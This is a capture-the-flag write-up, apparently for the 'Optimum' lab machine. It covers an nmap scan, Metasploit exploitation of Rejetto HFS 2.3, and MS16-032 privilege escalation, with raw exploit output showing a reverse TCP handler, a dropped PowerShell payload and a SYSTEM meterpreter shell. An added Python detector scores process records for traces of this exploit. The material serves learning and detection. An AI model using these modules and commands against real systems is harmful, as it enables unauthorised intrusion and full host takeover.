Enumeration

We start with an nmap scan:

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_  Supported Methods: GET HEAD POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Only one port is open: port 80, running Rejetto HFS (HTTP File Server) version 2.3, a file-sharing web server. If you have done the coursework for the eJPT exam, you’ll recognise this service, as it is used in many of the training lab scenarios.

Exploiting HFS

HFS version 2.3 is very simple to exploit: there is a Metasploit module for it, and it only needs the target (and the listener address) set to work:

use windows/http/rejetto_hfs_exec
set RHOSTS <target>
set LHOST tun0
run

Exploiting this gives us a shell on the machine as the kostas user.

Privilege Escalation

It took me a while to work out how to escalate privileges on this machine. I was expecting something like stored credentials that would let me upgrade to an administrator account.

I ran winPEAS, which identified a few exploits to try, one of which was Metasploit’s windows/local/ms16_032_secondary_logon_handle_privesc. Setting its SESSION option to the existing active meterpreter session and running it was successful.

[*] Started reverse TCP handler on 10.10.14.55:4455
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\ArapGh.ps1...
[*] Compressing script contents...
[+] Compressed size: 3743
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	
	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2352

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+         $tt2m = [Ntdll]::NtImpersonateThread($kIsKw, $kIsKw, [ref]$mMs2W)
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (mMs2W:VariablePath) [], Runti
   meException
    + FullyQualifiedErrorId : NonExistingVariableReference

[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+     $tt2m = [Advapi32]::DuplicateToken($do0i, 2, [ref]$vW)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument

[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

m4cBn3bQLPZAmuyzkrhiKlgKfv3DPjHo
[+] Executed on target machine.
[*] Sending stage (176198 bytes) to 10.129.79.42
[*] Meterpreter session 3 opened (10.10.14.55:4455 -> 10.129.79.42:49164) at 2024-07-28 17:44:30 +1000
[+] Deleted C:\Users\kostas\AppData\Local\Temp\ArapGh.ps1

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows Server 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We end up with a SYSTEM shell (NT AUTHORITY\SYSTEM) and have fully compromised the host.
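The exploit output above leaves recognisable host artefacts: 32-bit PowerShell launched from SysWOW64, a .ps1 dropped in the user's Temp folder, and a shell whose process tree starts at the HFS service. As an added example, not code from the original writeup, the Python below scores constructed process-creation records for those traits; the flattened key=value record format, the field names and the hfs.exe parent image name are assumptions.

```python
import re

# Constructed process-creation records (Sysmon event 1 / Security 4688 style,
# flattened to key=value pairs). Hostnames, paths and the hfs.exe parent are
# assumptions made for this example, not data taken from the original writeup.
SAMPLE_EVENTS = [
    "User=OPTIMUM\\kostas "
    "Image=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -nop -w hidden -f "
    "C:\\Users\\kostas\\AppData\\Local\\Temp\\ArapGh.ps1 "
    "ParentImage=C:\\Program Files\\HFS\\hfs.exe",
    "User=OPTIMUM\\kostas Image=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /c whoami ParentImage=C:\\Windows\\explorer.exe",
]

# A value runs until the next " Key=" token, so command lines may contain spaces.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

def parse_event(line):
    """Split one flattened key=value record into a dict."""
    return {key: value for key, value in FIELD_RE.findall(line)}

def score_event(event):
    """Return the suspicious traits seen in one process-creation event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    parent = event.get("ParentImage", "").lower()
    findings = []
    # 32-bit PowerShell on a 64-bit host: the exploit explicitly uses SYSWOW64.
    if "\\syswow64\\" in image and image.endswith("\\powershell.exe"):
        findings.append("syswow64_powershell")
    # A .ps1 dropped into the user's Temp folder, as the payload script was.
    if re.search(r"\\appdata\\local\\temp\\[^\\\s]+\.ps1", cmd):
        findings.append("temp_ps1_script")
    # Shell spawned by the HFS web server process (assumed parent image name).
    if parent.endswith("\\hfs.exe"):
        findings.append("spawned_by_hfs")
    return findings

def triage(lines):
    """Return (user, image, findings) for every event with at least one finding."""
    hits = []
    for line in lines:
        event = parse_event(line)
        findings = score_event(event)
        if findings:
            hits.append((event.get("User", "?"), event.get("Image", "?"), findings))
    return hits
```

Any one trait on its own is common in legitimate administration; the first sample record trips all three, which is the combination worth alerting on.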

I’m not certain of the best way to identify this exploit in future, other than searching for the operating system version. Microsoft’s bulletin, https://learn.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032, lists the affected versions.